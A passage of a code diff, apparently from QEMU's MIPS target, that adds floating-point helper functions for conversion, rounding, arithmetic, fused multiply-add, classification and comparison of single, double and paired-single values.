helper_float_cvts_l(CPUMIPSState *env, uint64_t dt0) +{ + uint32_t fst2; + + fst2 = int64_to_float32(dt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint32_t helper_float_cvts_pl(CPUMIPSState *env, uint32_t wt0) +{ + uint32_t wt2; + + wt2 = wt0; + update_fcr31(env, GETPC()); + return wt2; +} + +uint32_t helper_float_cvts_pu(CPUMIPSState *env, uint32_t wth0) +{ + uint32_t wt2; + + wt2 = wth0; + 
update_fcr31(env, GETPC()); + return wt2; +} + +uint32_t helper_float_cvtw_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t wt2; + + wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + return wt2; +} + +uint32_t helper_float_cvtw_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t wt2; + + wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint64_t helper_float_roundl_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t dt2; + + set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); + dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint64_t helper_float_roundl_s(CPUMIPSState *env, uint32_t fst0) +{ + uint64_t dt2; + + set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); + dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint32_t helper_float_roundw_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t wt2; + + set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); + wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 
= FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint32_t helper_float_roundw_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t wt2; + + set_float_rounding_mode(float_round_nearest_even, &env->active_fpu.fp_status); + wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint64_t helper_float_truncl_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t dt2; + + dt2 = float64_to_int64_round_to_zero(fdt0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint64_t helper_float_truncl_s(CPUMIPSState *env, uint32_t fst0) +{ + uint64_t dt2; + + dt2 = float32_to_int64_round_to_zero(fst0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint32_t helper_float_truncw_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t wt2; + + wt2 = float64_to_int32_round_to_zero(fdt0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint32_t helper_float_truncw_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t wt2; + + wt2 = float32_to_int32_round_to_zero(fst0, &env->active_fpu.fp_status); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint64_t helper_float_ceill_d(CPUMIPSState *env, 
uint64_t fdt0) +{ + uint64_t dt2; + + set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); + dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint64_t helper_float_ceill_s(CPUMIPSState *env, uint32_t fst0) +{ + uint64_t dt2; + + set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); + dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint32_t helper_float_ceilw_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t wt2; + + set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); + wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint32_t helper_float_ceilw_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t wt2; + + set_float_rounding_mode(float_round_up, &env->active_fpu.fp_status); + wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint64_t helper_float_floorl_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t dt2; + + set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); + dt2 = float64_to_int64(fdt0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if 
(get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint64_t helper_float_floorl_s(CPUMIPSState *env, uint32_t fst0) +{ + uint64_t dt2; + + set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); + dt2 = float32_to_int64(fst0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + dt2 = FP_TO_INT64_OVERFLOW; + } + update_fcr31(env, GETPC()); + return dt2; +} + +uint32_t helper_float_floorw_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t wt2; + + set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); + wt2 = float64_to_int32(fdt0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +uint32_t helper_float_floorw_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t wt2; + + set_float_rounding_mode(float_round_down, &env->active_fpu.fp_status); + wt2 = float32_to_int32(fst0, &env->active_fpu.fp_status); + restore_rounding_mode(env); + if (get_float_exception_flags(&env->active_fpu.fp_status) + & (float_flag_invalid | float_flag_overflow)) { + wt2 = FP_TO_INT32_OVERFLOW; + } + update_fcr31(env, GETPC()); + return wt2; +} + +/* unary operations, not modifying fp status */ +#define FLOAT_UNOP(name) \ +uint64_t helper_float_ ## name ## _d(uint64_t fdt0) \ +{ \ + return float64_ ## name(fdt0); \ +} \ +uint32_t helper_float_ ## name ## _s(uint32_t fst0) \ +{ \ + return float32_ ## name(fst0); \ +} \ +uint64_t helper_float_ ## name ## _ps(uint64_t fdt0) \ +{ \ + uint32_t wt0; \ + uint32_t wth0; \ + \ + wt0 = float32_ ## name(fdt0 & 0XFFFFFFFF); \ + wth0 = float32_ ## name(fdt0 >> 32); \ + return 
((uint64_t)wth0 << 32) | wt0; \ +} +FLOAT_UNOP(abs) +FLOAT_UNOP(chs) +#undef FLOAT_UNOP + +#define FLOAT_FMADDSUB(name, bits, muladd_arg) \ +uint ## bits ## _t helper_float_ ## name (CPUMIPSState *env, \ + uint ## bits ## _t fs, \ + uint ## bits ## _t ft, \ + uint ## bits ## _t fd) \ +{ \ + uint ## bits ## _t fdret; \ + \ + fdret = float ## bits ## _muladd(fs, ft, fd, muladd_arg, \ + &env->active_fpu.fp_status); \ + update_fcr31(env, GETPC()); \ + return fdret; \ +} + +FLOAT_FMADDSUB(maddf_s, 32, 0) +FLOAT_FMADDSUB(maddf_d, 64, 0) +FLOAT_FMADDSUB(msubf_s, 32, float_muladd_negate_product) +FLOAT_FMADDSUB(msubf_d, 64, float_muladd_negate_product) +#undef FLOAT_FMADDSUB + +#define FLOAT_MINMAX(name, bits, minmaxfunc) \ +uint ## bits ## _t helper_float_ ## name (CPUMIPSState *env, \ + uint ## bits ## _t fs, \ + uint ## bits ## _t ft) \ +{ \ + uint ## bits ## _t fdret; \ + \ + fdret = float ## bits ## _ ## minmaxfunc(fs, ft, \ + &env->active_fpu.fp_status); \ + update_fcr31(env, GETPC()); \ + return fdret; \ +} + +FLOAT_MINMAX(max_s, 32, maxnum) +FLOAT_MINMAX(max_d, 64, maxnum) +FLOAT_MINMAX(maxa_s, 32, maxnummag) +FLOAT_MINMAX(maxa_d, 64, maxnummag) + +FLOAT_MINMAX(min_s, 32, minnum) +FLOAT_MINMAX(min_d, 64, minnum) +FLOAT_MINMAX(mina_s, 32, minnummag) +FLOAT_MINMAX(mina_d, 64, minnummag) +#undef FLOAT_MINMAX + +#define FLOAT_RINT(name, bits) \ +uint ## bits ## _t helper_float_ ## name (CPUMIPSState *env, \ + uint ## bits ## _t fs) \ +{ \ + uint ## bits ## _t fdret; \ + \ + fdret = float ## bits ## _round_to_int(fs, &env->active_fpu.fp_status); \ + update_fcr31(env, GETPC()); \ + return fdret; \ +} + +FLOAT_RINT(rint_s, 32) +FLOAT_RINT(rint_d, 64) +#undef FLOAT_RINT + +#define FLOAT_CLASS_SIGNALING_NAN 0x001 +#define FLOAT_CLASS_QUIET_NAN 0x002 +#define FLOAT_CLASS_NEGATIVE_INFINITY 0x004 +#define FLOAT_CLASS_NEGATIVE_NORMAL 0x008 +#define FLOAT_CLASS_NEGATIVE_SUBNORMAL 0x010 +#define FLOAT_CLASS_NEGATIVE_ZERO 0x020 +#define FLOAT_CLASS_POSITIVE_INFINITY 0x040 +#define 
FLOAT_CLASS_POSITIVE_NORMAL 0x080 +#define FLOAT_CLASS_POSITIVE_SUBNORMAL 0x100 +#define FLOAT_CLASS_POSITIVE_ZERO 0x200 + +#define FLOAT_CLASS(name, bits) \ +uint ## bits ## _t helper_float_ ## name (uint ## bits ## _t arg) \ +{ \ + if (float ## bits ## _is_signaling_nan(arg)) { \ + return FLOAT_CLASS_SIGNALING_NAN; \ + } else if (float ## bits ## _is_quiet_nan(arg)) { \ + return FLOAT_CLASS_QUIET_NAN; \ + } else if (float ## bits ## _is_neg(arg)) { \ + if (float ## bits ## _is_infinity(arg)) { \ + return FLOAT_CLASS_NEGATIVE_INFINITY; \ + } else if (float ## bits ## _is_zero(arg)) { \ + return FLOAT_CLASS_NEGATIVE_ZERO; \ + } else if (float ## bits ## _is_zero_or_denormal(arg)) { \ + return FLOAT_CLASS_NEGATIVE_SUBNORMAL; \ + } else { \ + return FLOAT_CLASS_NEGATIVE_NORMAL; \ + } \ + } else { \ + if (float ## bits ## _is_infinity(arg)) { \ + return FLOAT_CLASS_POSITIVE_INFINITY; \ + } else if (float ## bits ## _is_zero(arg)) { \ + return FLOAT_CLASS_POSITIVE_ZERO; \ + } else if (float ## bits ## _is_zero_or_denormal(arg)) { \ + return FLOAT_CLASS_POSITIVE_SUBNORMAL; \ + } else { \ + return FLOAT_CLASS_POSITIVE_NORMAL; \ + } \ + } \ +} + +FLOAT_CLASS(class_s, 32) +FLOAT_CLASS(class_d, 64) +#undef FLOAT_CLASS + +/* MIPS specific unary operations */ +uint64_t helper_float_recip_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t fdt2; + + fdt2 = float64_div(float64_one, fdt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint32_t helper_float_recip_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t fst2; + + fst2 = float32_div(float32_one, fst0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint64_t helper_float_rsqrt_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t fdt2; + + fdt2 = float64_sqrt(fdt0, &env->active_fpu.fp_status); + fdt2 = float64_div(float64_one, fdt2, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint32_t helper_float_rsqrt_s(CPUMIPSState *env, 
uint32_t fst0) +{ + uint32_t fst2; + + fst2 = float32_sqrt(fst0, &env->active_fpu.fp_status); + fst2 = float32_div(float32_one, fst2, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint64_t helper_float_recip1_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t fdt2; + + fdt2 = float64_div(float64_one, fdt0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint32_t helper_float_recip1_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t fst2; + + fst2 = float32_div(float32_one, fst0, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint64_t helper_float_recip1_ps(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t fst2; + uint32_t fsth2; + + fst2 = float32_div(float32_one, fdt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); + fsth2 = float32_div(float32_one, fdt0 >> 32, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +uint64_t helper_float_rsqrt1_d(CPUMIPSState *env, uint64_t fdt0) +{ + uint64_t fdt2; + + fdt2 = float64_sqrt(fdt0, &env->active_fpu.fp_status); + fdt2 = float64_div(float64_one, fdt2, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint32_t helper_float_rsqrt1_s(CPUMIPSState *env, uint32_t fst0) +{ + uint32_t fst2; + + fst2 = float32_sqrt(fst0, &env->active_fpu.fp_status); + fst2 = float32_div(float32_one, fst2, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return fst2; +} + +uint64_t helper_float_rsqrt1_ps(CPUMIPSState *env, uint64_t fdt0) +{ + uint32_t fst2; + uint32_t fsth2; + + fst2 = float32_sqrt(fdt0 & 0XFFFFFFFF, &env->active_fpu.fp_status); + fsth2 = float32_sqrt(fdt0 >> 32, &env->active_fpu.fp_status); + fst2 = float32_div(float32_one, fst2, &env->active_fpu.fp_status); + fsth2 = float32_div(float32_one, fsth2, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +#define FLOAT_OP(name, p) void 
helper_float_##name##_##p(CPUMIPSState *env) + +/* binary operations */ +#define FLOAT_BINOP(name) \ +uint64_t helper_float_ ## name ## _d(CPUMIPSState *env, \ + uint64_t fdt0, uint64_t fdt1) \ +{ \ + uint64_t dt2; \ + \ + dt2 = float64_ ## name (fdt0, fdt1, &env->active_fpu.fp_status); \ + update_fcr31(env, GETPC()); \ + return dt2; \ +} \ + \ +uint32_t helper_float_ ## name ## _s(CPUMIPSState *env, \ + uint32_t fst0, uint32_t fst1) \ +{ \ + uint32_t wt2; \ + \ + wt2 = float32_ ## name (fst0, fst1, &env->active_fpu.fp_status); \ + update_fcr31(env, GETPC()); \ + return wt2; \ +} \ + \ +uint64_t helper_float_ ## name ## _ps(CPUMIPSState *env, \ + uint64_t fdt0, \ + uint64_t fdt1) \ +{ \ + uint32_t fst0 = fdt0 & 0XFFFFFFFF; \ + uint32_t fsth0 = fdt0 >> 32; \ + uint32_t fst1 = fdt1 & 0XFFFFFFFF; \ + uint32_t fsth1 = fdt1 >> 32; \ + uint32_t wt2; \ + uint32_t wth2; \ + \ + wt2 = float32_ ## name (fst0, fst1, &env->active_fpu.fp_status); \ + wth2 = float32_ ## name (fsth0, fsth1, &env->active_fpu.fp_status); \ + update_fcr31(env, GETPC()); \ + return ((uint64_t)wth2 << 32) | wt2; \ +} + +FLOAT_BINOP(add) +FLOAT_BINOP(sub) +FLOAT_BINOP(mul) +FLOAT_BINOP(div) +#undef FLOAT_BINOP + +#define UNFUSED_FMA(prefix, a, b, c, flags) \ +{ \ + a = prefix##_mul(a, b, &env->active_fpu.fp_status); \ + if ((flags) & float_muladd_negate_c) { \ + a = prefix##_sub(a, c, &env->active_fpu.fp_status); \ + } else { \ + a = prefix##_add(a, c, &env->active_fpu.fp_status); \ + } \ + if ((flags) & float_muladd_negate_result) { \ + a = prefix##_chs(a); \ + } \ +} + +/* FMA based operations */ +#define FLOAT_FMA(name, type) \ +uint64_t helper_float_ ## name ## _d(CPUMIPSState *env, \ + uint64_t fdt0, uint64_t fdt1, \ + uint64_t fdt2) \ +{ \ + UNFUSED_FMA(float64, fdt0, fdt1, fdt2, type); \ + update_fcr31(env, GETPC()); \ + return fdt0; \ +} \ + \ +uint32_t helper_float_ ## name ## _s(CPUMIPSState *env, \ + uint32_t fst0, uint32_t fst1, \ + uint32_t fst2) \ +{ \ + UNFUSED_FMA(float32, fst0, fst1, 
fst2, type); \ + update_fcr31(env, GETPC()); \ + return fst0; \ +} \ + \ +uint64_t helper_float_ ## name ## _ps(CPUMIPSState *env, \ + uint64_t fdt0, uint64_t fdt1, \ + uint64_t fdt2) \ +{ \ + uint32_t fst0 = fdt0 & 0XFFFFFFFF; \ + uint32_t fsth0 = fdt0 >> 32; \ + uint32_t fst1 = fdt1 & 0XFFFFFFFF; \ + uint32_t fsth1 = fdt1 >> 32; \ + uint32_t fst2 = fdt2 & 0XFFFFFFFF; \ + uint32_t fsth2 = fdt2 >> 32; \ + \ + UNFUSED_FMA(float32, fst0, fst1, fst2, type); \ + UNFUSED_FMA(float32, fsth0, fsth1, fsth2, type); \ + update_fcr31(env, GETPC()); \ + return ((uint64_t)fsth0 << 32) | fst0; \ +} +FLOAT_FMA(madd, 0) +FLOAT_FMA(msub, float_muladd_negate_c) +FLOAT_FMA(nmadd, float_muladd_negate_result) +FLOAT_FMA(nmsub, float_muladd_negate_result | float_muladd_negate_c) +#undef FLOAT_FMA + +/* MIPS specific binary operations */ +uint64_t helper_float_recip2_d(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) +{ + fdt2 = float64_mul(fdt0, fdt2, &env->active_fpu.fp_status); + fdt2 = float64_chs(float64_sub(fdt2, float64_one, &env->active_fpu.fp_status)); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint32_t helper_float_recip2_s(CPUMIPSState *env, uint32_t fst0, uint32_t fst2) +{ + fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); + fst2 = float32_chs(float32_sub(fst2, float32_one, &env->active_fpu.fp_status)); + update_fcr31(env, GETPC()); + return fst2; +} + +uint64_t helper_float_recip2_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) +{ + uint32_t fst0 = fdt0 & 0XFFFFFFFF; + uint32_t fsth0 = fdt0 >> 32; + uint32_t fst2 = fdt2 & 0XFFFFFFFF; + uint32_t fsth2 = fdt2 >> 32; + + fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); + fsth2 = float32_mul(fsth0, fsth2, &env->active_fpu.fp_status); + fst2 = float32_chs(float32_sub(fst2, float32_one, &env->active_fpu.fp_status)); + fsth2 = float32_chs(float32_sub(fsth2, float32_one, &env->active_fpu.fp_status)); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +uint64_t 
helper_float_rsqrt2_d(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) +{ + fdt2 = float64_mul(fdt0, fdt2, &env->active_fpu.fp_status); + fdt2 = float64_sub(fdt2, float64_one, &env->active_fpu.fp_status); + fdt2 = float64_chs(float64_div(fdt2, FLOAT_TWO64, &env->active_fpu.fp_status)); + update_fcr31(env, GETPC()); + return fdt2; +} + +uint32_t helper_float_rsqrt2_s(CPUMIPSState *env, uint32_t fst0, uint32_t fst2) +{ + fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); + fst2 = float32_sub(fst2, float32_one, &env->active_fpu.fp_status); + fst2 = float32_chs(float32_div(fst2, FLOAT_TWO32, &env->active_fpu.fp_status)); + update_fcr31(env, GETPC()); + return fst2; +} + +uint64_t helper_float_rsqrt2_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt2) +{ + uint32_t fst0 = fdt0 & 0XFFFFFFFF; + uint32_t fsth0 = fdt0 >> 32; + uint32_t fst2 = fdt2 & 0XFFFFFFFF; + uint32_t fsth2 = fdt2 >> 32; + + fst2 = float32_mul(fst0, fst2, &env->active_fpu.fp_status); + fsth2 = float32_mul(fsth0, fsth2, &env->active_fpu.fp_status); + fst2 = float32_sub(fst2, float32_one, &env->active_fpu.fp_status); + fsth2 = float32_sub(fsth2, float32_one, &env->active_fpu.fp_status); + fst2 = float32_chs(float32_div(fst2, FLOAT_TWO32, &env->active_fpu.fp_status)); + fsth2 = float32_chs(float32_div(fsth2, FLOAT_TWO32, &env->active_fpu.fp_status)); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +uint64_t helper_float_addr_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt1) +{ + uint32_t fst0 = fdt0 & 0XFFFFFFFF; + uint32_t fsth0 = fdt0 >> 32; + uint32_t fst1 = fdt1 & 0XFFFFFFFF; + uint32_t fsth1 = fdt1 >> 32; + uint32_t fst2; + uint32_t fsth2; + + fst2 = float32_add (fst0, fsth0, &env->active_fpu.fp_status); + fsth2 = float32_add (fst1, fsth1, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +uint64_t helper_float_mulr_ps(CPUMIPSState *env, uint64_t fdt0, uint64_t fdt1) +{ + uint32_t fst0 = fdt0 & 0XFFFFFFFF; + 
uint32_t fsth0 = fdt0 >> 32; + uint32_t fst1 = fdt1 & 0XFFFFFFFF; + uint32_t fsth1 = fdt1 >> 32; + uint32_t fst2; + uint32_t fsth2; + + fst2 = float32_mul (fst0, fsth0, &env->active_fpu.fp_status); + fsth2 = float32_mul (fst1, fsth1, &env->active_fpu.fp_status); + update_fcr31(env, GETPC()); + return ((uint64_t)fsth2 << 32) | fst2; +} + +/* compare operations */ +#define FOP_COND_D(op, cond) \ +void helper_cmp_d_ ## op(CPUMIPSState *env, uint64_t fdt0, \ + uint64_t fdt1, int cc) \ +{ \ + int c; \ + c = cond; \ + update_fcr31(env, GETPC()); \ + if (c) \ + SET_FP_COND(cc, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc, env->active_fpu); \ +} \ +void helper_cmpabs_d_ ## op(CPUMIPSState *env, uint64_t fdt0, \ + uint64_t fdt1, int cc) \ +{ \ + int c; \ + fdt0 = float64_abs(fdt0); \ + fdt1 = float64_abs(fdt1); \ + c = cond; \ + update_fcr31(env, GETPC()); \ + if (c) \ + SET_FP_COND(cc, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc, env->active_fpu); \ +} + +/* NOTE: the comma operator will make "cond" to eval to false, + * but float64_unordered_quiet() is still called. 
*/ +FOP_COND_D(f, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status), 0)) +FOP_COND_D(un, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status)) +FOP_COND_D(eq, float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(ueq, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(olt, float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(ult, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(ole, float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(ule, float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status)) +/* NOTE: the comma operator will make "cond" to eval to false, + * but float64_unordered() is still called. */ +FOP_COND_D(sf, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status), 0)) +FOP_COND_D(ngle,float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status)) +FOP_COND_D(seq, float64_eq(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(ngl, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_eq(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(lt, float64_lt(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(nge, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(le, float64_le(fdt0, fdt1, &env->active_fpu.fp_status)) +FOP_COND_D(ngt, float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) || float64_le(fdt0, fdt1, &env->active_fpu.fp_status)) + +#define FOP_COND_S(op, cond) \ +void helper_cmp_s_ ## op(CPUMIPSState *env, uint32_t fst0, \ + uint32_t fst1, int cc) \ +{ \ + int c; \ + c = cond; \ + update_fcr31(env, GETPC()); \ + if (c) \ + SET_FP_COND(cc, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc, env->active_fpu); \ +} \ +void helper_cmpabs_s_ ## 
op(CPUMIPSState *env, uint32_t fst0, \ + uint32_t fst1, int cc) \ +{ \ + int c; \ + fst0 = float32_abs(fst0); \ + fst1 = float32_abs(fst1); \ + c = cond; \ + update_fcr31(env, GETPC()); \ + if (c) \ + SET_FP_COND(cc, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc, env->active_fpu); \ +} + +/* NOTE: the comma operator will make "cond" to eval to false, + * but float32_unordered_quiet() is still called. */ +FOP_COND_S(f, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), 0)) +FOP_COND_S(un, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status)) +FOP_COND_S(eq, float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(ueq, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(olt, float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(ult, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(ole, float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(ule, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status)) +/* NOTE: the comma operator will make "cond" to eval to false, + * but float32_unordered() is still called. 
*/ +FOP_COND_S(sf, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status), 0)) +FOP_COND_S(ngle,float32_unordered(fst1, fst0, &env->active_fpu.fp_status)) +FOP_COND_S(seq, float32_eq(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(ngl, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_eq(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(lt, float32_lt(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(nge, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(le, float32_le(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(ngt, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_le(fst0, fst1, &env->active_fpu.fp_status)) + +#define FOP_COND_PS(op, condl, condh) \ +void helper_cmp_ps_ ## op(CPUMIPSState *env, uint64_t fdt0, \ + uint64_t fdt1, int cc) \ +{ \ + uint32_t fst0, fsth0, fst1, fsth1; \ + int ch, cl; \ + fst0 = fdt0 & 0XFFFFFFFF; \ + fsth0 = fdt0 >> 32; \ + fst1 = fdt1 & 0XFFFFFFFF; \ + fsth1 = fdt1 >> 32; \ + cl = condl; \ + ch = condh; \ + update_fcr31(env, GETPC()); \ + if (cl) \ + SET_FP_COND(cc, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc, env->active_fpu); \ + if (ch) \ + 